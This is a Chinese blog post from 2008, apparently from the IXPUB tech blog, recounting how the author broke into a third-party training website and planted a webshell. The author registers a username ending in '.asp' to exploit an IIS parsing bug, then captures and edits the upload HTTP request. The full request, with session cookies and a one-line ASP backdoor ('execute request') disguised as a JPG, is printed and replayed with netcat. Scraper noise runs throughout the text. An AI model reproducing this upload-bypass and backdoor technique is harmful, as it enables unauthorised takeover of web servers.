修改数据包拿WebShell

上一篇 / 下一篇  2008-11-30 08:26:38

查看( 31 ) / 评论( 0 ) / 评分( 0 / 0 )
IXPUB技术博客.oX6e!te,g2i&_ Z

难道我最近真的是人品爆发了?竟然一个接一个全都搞定了,且各个都出乎我的意料之外。好了,不废话了,记录一下这次是如何抓包-》改包-》上
0G w6F#X0D'jE0传-》拿到WEBSHELL的。IXPUB技术博客tV}#oH4q
经过仔细分析,这个网站无论从主站还是分站都不存在任何注入漏洞,当然这种网站不用说使用的是MSSQL数据,也就谈不上找到ACCESS数据库下载
;r8^cEI0,更没找到管理后台页。

I+u)o)EQL*?z|.h h ]0IXPUB技术博客!k s&a8g7PC

IXPUB技术博客hO%Y8h ]*VO(I

IXPUB技术博客["@qW*Z~5h&b

那就注册一个用户进去看吧这里的注册一共可以选择3种用户类型:普通会员、讲师会员、机构会员。注册的时候网页上有提示哪个角色有什么样的权
'g2X3{T??RL0限。3个我都注册了一次,分析得出普通会员与讲师会员都没可能性,机构会员可以上传培训资料,然而注册后需要人工审核,所以估计没戏了。
!i[w ~7^"R6kl3h0逛完他的网站再接着逛论坛,论坛采用的是DVBBS8.0版,至于是MSSQL还是ACCESS暂不知道,不过从感觉上来说,应该是ACCESS的数据库。BBS的管理IXPUB技术博客y1t1Inp%|`}
后台可以访问,默认数据库名被改,默认管理帐号及密码都登录失败。DVBBS8.0的远程注入漏洞也宣告失败。
5Iex9R2c p1qP)_0至此,我觉得这站真的是无敌了(对我来说)。于是丢给别人去研究了,没想到没过2个小时,他就拿到WEBSHEL了,当然人家也没告诉我是怎么弄的IXPUB技术博客5I$X/HDG IY3@
,因为我们不认识。我靠~搞笑啊,我没那么弱吧?怎么可能别人都能搞定我就不行呢?我是不是有啥没想到的?赶紧反省一下...
.Qi6f'{(U.{/RE \0分析来分析去,我觉得问题一定还是出在机构会员那里,可是注册后还得24小时后人工审核,他不可能2个小时就搞定的呀...IXPUB技术博客 B3X Li-_7}So
注意观察了一下,有了一点小发现:某些页面所在的URL是类似这种格式的:IXPUB技术博客5i wx\pT.yQ
/pic/10/a2008-11-30-580201.jpgIXPUB技术博客 _gp~-{D0]#LI ~ tL
这里的*所代表的依旧是注册时的用户名!O(∩_∩)O哈哈~再结合上面的小发现,是不是更觉得有意思了?我们可以注册一个用户名后三位是“.asp”IXPUB技术博客J$|;f[8Dhu:x P
的,然后传个图片上去,由于IIS的解析BUG,这个.asp用户名目录下的所有文件都被解析成asp并执行了。
B1j }Oz |:B3|0可是刚注册的机构会员不是要审核吗?这不就又得等了吗?嗯,起初我也是这么想的,可是测试之后我发现只要注册了,无论是否已审核都会创建那IXPUB技术博客%nH'GGp\
个目录。
%T)Lqbs2D$T0好,思路已经清晰了,是时候该实践了。在上传LOGO那里右键查看原文件,搜索action发现它的值是这样的:
3_5}S&n2Mh?0uppic.asp?picurl=pic&file_ad=UploadImg/****IXPUB技术博客(|e`"o+Y ^ e(?|
这里的*就不需要我再解释了吧?试试将这里的用户名更改为neeke.asp并将URL补全,接着把这个页面保存成本地html,然后打开这个本地html页面上
$IXQp1`#V(d)y0传一个后缀改为jpg的asp后门,上传结果是失败!是不是要疯了?难道这就是理论与实践的差距?
F2_mC/Am0接下来才是今日的主题,虽然不知道为什么会失败,不过也是意料之内的。重新上传一次(不是使用前面的本地html)并打开WSockExpert进行抓包。IXPUB技术博客$o+f/}#he4z+`7LD
抓到的数据包如下:
*qOh(g'[ ?@U0POST /upload/uppic.asp?picurl=pic&file_ad=UploadImg/**** HTTP/1.1
+y8Q-vt4s Z `0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-silverlight,
(Pb2L p vQn/I0application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Qiei-?0Referer: http://www.xxxxx.com/xxxx/upload/uppic.asp?picurl=pic&file_ad=UploadImg/****IXPUB技术博客^p:u;I2wsP
Accept-Language: zh-cn
@a Rc/U5zX0Content-Type: multipart/form-data; boundary=---------------------------7d89c6100702
H"Ln4wP,^ d7fQ D6c0Accept-Encoding: gzip, deflateIXPUB技术博客@z wpt8Z6o
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)IXPUB技术博客cXU e W@
Host: www.xxxxx.com
K d V']n0i.DK0Content-Length: 356IXPUB技术博客 Ba?CZI
Connection: Keep-Alive
e.naNah@0Cache-Control: no-cacheIXPUB技术博客1`&l'C.s#Kb
Cookie: ASPSESSIONIDQCBQDTRD=CBDAOFCDOKNKAFBGOJIELFBL; StatUserID=; geturl=%2Fbbs%2Findex%2Easp%3Fboardid%3D19; upNum=0;IXPUB技术博客Y/Hl)q2Jq} m&A*G
cck_lasttime=1227791151328; cck_count=0; cnzz_a723913=148; vw=%3A21294148%3A56594595%3A24657327%3A74573309%3A50974716%3A50987662%IXPUB技术博客2[JAG*hL7u
3A37122531%3A67808458%3A70586579%3A70604138%3A28852802%3A47119284%3A76191357%3A37126954%3A51284925%3A52364933%3A38661202%IXPUB技术博客b nw s [:Z V'n.M
3A74790164%3A70610751%3A72013662%3A73415389%3A76191358%3A49587472%3A43119978%3A-251370864%3A73388968%3A70611921%3A73384211%IXPUB技术博客o/vr)^}{ d'~PGm~N
3A32870242%3A37063863%3A32420673%3A53783557%3A72013663%3A65003880%3A70588081%3A66406723%3A57972621%3A73406321%3A60801952%
QFX2v;q%X|`R?03A40826249%3A39695629%3A49578341%3A59386483%3A41111789%3A25224022%3A69210191%3A53796330%3A38456400%3A62172134%3A29259370%
7A/dsI5B03A36499102%3A46949182%3A32361261%3A31862738%3A79674658%3A34731608%3A102446092%3A36507283%3A81784150%3A86027646%3A81809181%
8q@Z0@ d/[9l~l03A74781075%3A72012436%3A80383143%3A83227606%3A76186399%3A81784130%3A77581333%3A73399009%3A78982247%3A73385225%3A78982193%IXPUB技术博客S5I&u+w}P%PK
3A88833998%3A87432179%3A74816111%3A; sin=-1; rtime=2; ltime=1227806311218; cnzz_eid=67318861-1227622346-; tab=4; Dvbbs=;
$I)Z)B5Cn,iYp0ystat_bc_809970=28764444891124193035; ystat_ss_809970=26_1227833988_1259315693IXPUB技术博客 bi,^#eq R"m
-----------------------------7d89c6100702IXPUB技术博客A(an IwW6WoI0K
Content-Disposition: form-data; name="FileName"; filename="D:\WEBSHELL\yjh.jpg"
O_^M6uW*hW0d8f+k0Content-Type: text/plainIXPUB技术博客5MV3K|,Bd
<%
s2N TORe G ~0On Error Resume NextIXPUB技术博客O-`X;wCPf1L
execute request("a")IXPUB技术博客4p6RT1\}-V,o5G
%>IXPUB技术博客 AorbDK6T
-----------------------------7d89c6100702
L6gfBMZ0Content-Disposition: form-data; name="Submit"IXPUB技术博客)t;]\^&x K/GJX
上传截图IXPUB技术博客&Q;U&R1LW
-----------------------------7d89c6100702--
_KZ4]-q6Z0将上面的数据包中的****更改为neeke.asp并保存为txt到同nc在一个目录下(名字可任意,这里为neeke.txt)。接下来进入DOS,在nc所在的目录输入IXPUB技术博客 pQ4oL*A c0U
nc -vv www.xxxxx.com 80<neeke.txt
:|d&I/c|5u l0稍等几秒就会返回数据提交结果。本次提交返回的结果如下图。

q(yD3rr'V0

*h_$nou1j:V0IXPUB技术博客9uE}"q*lWF G

OL%||(c0OK,搞定了!嘿嘿~~看来我以后还得更加细心的分析才是啊!有再牛X的技术,没有好的头脑,你也是笨牛一个。

E S!~2u4N{ v5Q9{$o0
3

3

导入论坛 引用链接 收藏 分享给好友 推荐到圈子 管理 举报

TAG:

 

评分:0

我来说两句

显示全部

:loveliness: :handshake :victory: :funk: :time: :kiss: :call: :hug: :lol :'( :Q :L ;P :$ :P :o :@ :D :( :)

日历

« 2009-01-03  
    123
45678910
11121314151617
18192021222324
25262728293031

数据统计

  • 访问量: 63757
  • 日志数: 1187
  • 文件数: 1
  • 建立时间: 2007-08-10
  • 更新时间: 2009-01-02

RSS订阅

Open Toolbar